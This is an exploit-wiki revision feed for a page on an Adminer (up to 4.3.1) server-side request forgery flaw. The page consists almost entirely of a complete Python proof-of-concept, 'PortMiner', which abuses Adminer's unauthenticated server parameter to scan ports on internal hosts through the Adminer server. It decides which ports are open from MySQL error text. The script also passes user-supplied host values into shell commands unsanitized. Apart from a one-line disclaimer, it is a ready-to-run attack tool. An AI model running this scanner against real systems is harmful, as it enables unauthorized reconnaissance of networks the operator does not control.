https://pwnwiki.com/index.php?action=history&feed=atom&title=Adminer_%E6%9C%8D%E5%8B%99%E5%99%A8%E7%AB%AF%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E
Adminer 服務器端請求偽造漏洞 - Revision history
2026-04-08T07:21:46Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Adminer_%E6%9C%8D%E5%8B%99%E5%99%A8%E7%AB%AF%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E&diff=1675&oldid=prev
Pwnwiki: Created page with "==漏洞影響== Adminer<=4.3.1 ==POC== <pre> import socket,re,ssl,warnings,subprocess,time from platform import system as system_name from os import system as system_call..."
2021-04-15T05:38:52Z
<p>Created page with "==漏洞影響== Adminer<=4.3.1 ==POC== <pre> import socket,re,ssl,warnings,subprocess,time from platform import system as system_name from os import system as system_call..."</p>
<p><b>New page</b></p><div>==漏洞影響==<br />
Adminer<=4.3.1<br />
<br />
<br />
==POC==<br />
<pre><br />
import socket,re,ssl,warnings,subprocess,time<br />
from platform import system as system_name <br />
from os import system as system_call<br />
<br />
#Adminer Server Side Request Forgery<br />
#PortMiner Scanner Tool<br />
#by John Page (hyp3rlinx)<br />
#ISR: ApparitionSec<br />
#hyp3rlinx.altervista.org <br />
#=========================<br />
#D1rty0Tis says hi.<br />
<br />
#timeout<br />
MAX_TIME=32<br />
#ports to log<br />
port_lst=[] <br />
#Web server response often times out but usually means ports open.<br />
false_pos_ports=['80','443'] <br />
<br />
BANNER='''<br />
____ _ __ __ _ <br />
| _ \ | | | \/ (_) <br />
| |__) |__ _ __| |_| \ / |_ _ __ ___ _ __ <br />
| ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| <br />
| | | (_) | | | |_| | | | | | | | __/ | <br />
|_| \___/|_| \__|_| |_|_|_| |_|\___|_| <br />
''' <br />
<br />
<br />
def info():<br />
print "\nPortMiner depends on Error messages to determine open/closed ports."<br />
print "Read operations reported 'timed out' may be open/filtered.\n"<br />
<br />
<br />
def greet():<br />
print 'Adminer Unauthenticated SSRF Port Scanner Tool'<br />
print 'Targets Adminer used for MySQL administration\n'<br />
print 'by hyp3rlinx - apparition security'<br />
print '-----------------------------------------------------\n'<br />
print 'Scan small ranges or single ports or expect to wait.\n'<br />
print 'Do not scan networks without authorized permission.'<br />
print 'Author not responsible for abuse/misuse.\n'<br />
<br />
<br />
def chk_ports(p): <br />
p=p.replace('-',',')<br />
port_arg=p.split(',')<br />
try:<br />
if len(port_arg)>1:<br />
if int(port_arg[1]) < int(port_arg[0]):<br />
print 'Port range not valid.'<br />
raw_input()<br />
return<br />
if int(port_arg[1])>65535:<br />
print 'Exceeded max Port range 65535.'<br />
raw_input()<br />
return<br />
except Exception as e:<br />
print str(e)<br />
return None<br />
return list(range(int(port_arg[0]),int(port_arg[1])+1))<br />
<br />
<br />
<br />
def log(IP):<br />
try:<br />
file=open('PortMiner.txt', 'w')<br />
file.write(IP+'\n')<br />
for p in port_lst:<br />
file.write(p+'\n')<br />
file.close()<br />
except Exception as e:<br />
print str(e)<br />
print "\nSee PortMiner.txt"<br />
<br />
<br />
def use_ssl(ADMINER,ADMINER_PORT):<br />
try:<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((ADMINER,int(ADMINER_PORT)))<br />
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)<br />
s.close()<br />
except Exception as e:<br />
print ""<br />
return False<br />
return True<br />
<br />
<br />
def version(ip,port,uri,use_ssl):<br />
res=""<br />
try:<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((ip,int(port)))<br />
if use_ssl:<br />
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23) <br />
s.send('GET '+'/'+uri+'/?server='+':'+'&username=\r\n\r\n')<br />
<br />
except Exception as e:<br />
print 'Host up but cant connect.' #str(e)<br />
print 'Re-check Host/Port/URI.'<br />
s.close()<br />
return 504<br />
<br />
while True:<br />
RES=s.recv(512)<br />
if RES.find('Forbidden')!=-1:<br />
print 'Forbidden 403'<br />
s.close()<br />
return None<br />
if RES.find('401 Authorization Required')!=-1:<br />
print '401 Authorization Required'<br />
s.close()<br />
return None<br />
ver = re.findall(r'<span>(.*)</span>',RES,re.DOTALL|re.MULTILINE)<br />
if not RES:<br />
s.close()<br />
return None<br />
if ver:<br />
print 'Your Adminer '+ ver[0] + ' works for us now.'<br />
s.close()<br />
return ver<br />
<br />
s.close()<br />
return None<br />
<br />
<br />
<br />
def scan(ADMINER,ADMINER_PORT,ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL):<br />
global MAX_TIME,port_range<br />
RES=''<br />
<br />
print 'scanning ports: %s ' % str(port_range[0])+'to ' + str(port_range[-1])+' ...'<br />
<br />
for aPort in port_range: <br />
aPort=str(aPort)<br />
<br />
try:<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.settimeout(MAX_TIME)<br />
s.connect((ADMINER,ADMINER_PORT))<br />
<br />
if USE_SSL:<br />
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23) <br />
<br />
s.send('GET /'+ADMINER_URI+'/?server='+TARGET+':'+aPort+'&username= HTTP/1.1\r\nHost: '+TARGET+'\r\n\r\n')<br />
<br />
except Exception as e:<br />
print str(e)<br />
s.close()<br />
return<br />
<br />
while True:<br />
try:<br />
RES=s.recv(512)<br />
###print RES<br />
###Should see HTTP/1.1 403 not 200<br />
if RES.find('HTTP/1.1 200 OK')!=-1:<br />
print 'port '+aPort + ' open'<br />
port_lst.append(aPort+' open')<br />
s.close()<br />
break<br />
<br />
if RES.find('400 Bad Request')!=-1:<br />
print '400 Bad Request, check params'<br />
s.close()<br />
break<br />
raw_input() <br />
<br />
lst=re.findall(r"([^\n<div>].*connect to MySQL server on.*[^</div>\n])|(Lost connection to MySQL server at.*)|(MySQL server has gone away.*)"+<br />
"|(No connection could be made because the target machine actively refused it.*)|(A connection attempt failed.*)|(HTTP/1.1 200 OK.*)", RES) <br />
<br />
if lst:<br />
status=str(lst)<br />
if status.find('connect to MySQL')!=-1:<br />
if PRINT_CLOSED:<br />
print 'port '+ aPort + ' closed'<br />
s.close()<br />
break<br />
elif status.find('machine actively refused it.')!=-1:<br />
if PRINT_CLOSED:<br />
print 'port '+ aPort + ' closed'<br />
s.close()<br />
break<br />
elif status.find('A connection attempt failed')!=-1:<br />
if PRINT_CLOSED:<br />
print 'port '+ aPort + ' closed'<br />
s.close()<br />
break<br />
elif status.find('reading initial communication packet')!=-1:<br />
print 'port '+aPort + ' open'<br />
port_lst.append(aPort+' open')<br />
s.close()<br />
break<br />
elif status.find('MySQL server has gone away')!=-1:<br />
print 'port '+aPort + ' open'<br />
port_lst.append(aPort+' open')<br />
s.close()<br />
break<br />
elif status.find('Bad file descriptor')!=-1:<br />
print 'port '+aPort + ' open'<br />
port_lst.append(aPort+' open')<br />
s.close()<br />
break<br />
elif status.find('Got packets out of order')!=-1:<br />
print 'port '+aPort + ' open'<br />
s.close()<br />
break<br />
<br />
except Exception as e:<br />
msg = str(e)<br />
###print msg<br />
if msg.find('timed out')!=-1 and aPort in false_pos_ports:<br />
print 'port '+aPort + ' open'<br />
port_lst.append(aPort+' open')<br />
s.close()<br />
break<br />
elif msg.find('timed out')!=-1: <br />
print 'port '+aPort + ' timed out'<br />
port_lst.append(aPort+' read operation timed out')<br />
s.close()<br />
break<br />
else:<br />
s.close()<br />
break<br />
<br />
if port_lst:<br />
log(TARGET)<br />
else:<br />
print "Scan completed, no ports mined."<br />
return 0<br />
<br />
<br />
<br />
def arp(host):<br />
args = "-a" if system_name().lower()=="windows" else "-e"<br />
return subprocess.call("arp " + args + " " + host, shell=True) == 0<br />
<br />
<br />
def ping_host(host):<br />
args = "-n 1" if system_name().lower()=="windows" else "-c 1"<br />
res=subprocess.call("ping " + args + " " + host, shell=True) == 0<br />
if not res:<br />
print str(host) + ' down? trying ARP'<br />
if not arp(host):<br />
print str(host) + ' unreachable.'<br />
return<br />
return res<br />
<br />
<br />
<br />
def main():<br />
global port_range<br />
print BANNER<br />
greet()<br />
ADMINER_VERSION=False<br />
PRINT_CLOSED=False<br />
USE_SSL=None<br />
<br />
ADMINER=raw_input('[+] Adminer Host/IP> ')<br />
if ADMINER=='':<br />
print 'Enter valid Host/IP'<br />
ADMINER=raw_input('[+] Adminer Host/IP> ')<br />
<br />
ADMINER_PORT=raw_input('[+] Adminer Port> ')<br />
if not re.search("^\d{1,5}$",ADMINER_PORT):<br />
print 'Enter a valid Port.'<br />
ADMINER_PORT=raw_input('[+] Adminer Port> ')<br />
<br />
ADMINER_URI=raw_input('[+] Adminer URI [the adminer-<version>.php OR adminer/ dir path] > ')<br />
TARGET=raw_input('[+] Host/IP to Scan> ')<br />
<br />
PORTS_TO_SCAN=raw_input('[+] Port Range e.g. 21-25> ').replace(' ','')<br />
plst=re.findall(r"(\d{1,5})-(\d{1,5})",PORTS_TO_SCAN)<br />
if not plst:<br />
print 'Invalid ports, format is 1-1025'<br />
return<br />
raw_input() #console up<br />
<br />
port_range=chk_ports(PORTS_TO_SCAN)<br />
if not port_range:<br />
return<br />
<br />
PRINT_CLOSED=raw_input('[+] Print closed ports? 1=Yes any key for No> ')<br />
if PRINT_CLOSED=='1':<br />
PRINT_CLOSED=True<br />
else:<br />
PRINT_CLOSED=False<br />
<br />
if not ping_host(ADMINER):<br />
print 'host %s not reachable or blocking ping ' % ADMINER <br />
cont=raw_input('Continue with scan? 1=Yes any key for No> ')<br />
if cont!='1':<br />
print 'Scan aborted.'<br />
raw_input() #console up<br />
return<br />
<br />
<br />
USE_SSL=use_ssl(ADMINER,ADMINER_PORT)<br />
time.sleep(2)<br />
ADMINER_VERSION = version(ADMINER,ADMINER_PORT,ADMINER_URI,USE_SSL)<br />
<br />
if not ADMINER_VERSION:<br />
print "Can't retrieve Adminer script. check supplied URI."<br />
raw_input() #console up<br />
return<br />
else:<br />
if ADMINER_VERSION==504:<br />
raw_input() #console up<br />
return<br />
if scan(ADMINER,int(ADMINER_PORT),ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL)==0:<br />
more=raw_input('Info: 1=Yes, any key for No> ')<br />
if more=='1':<br />
info()<br />
raw_input() #console up<br />
<br />
<br />
if __name__=='__main__':<br />
main()<br />
</pre></div>
Pwnwiki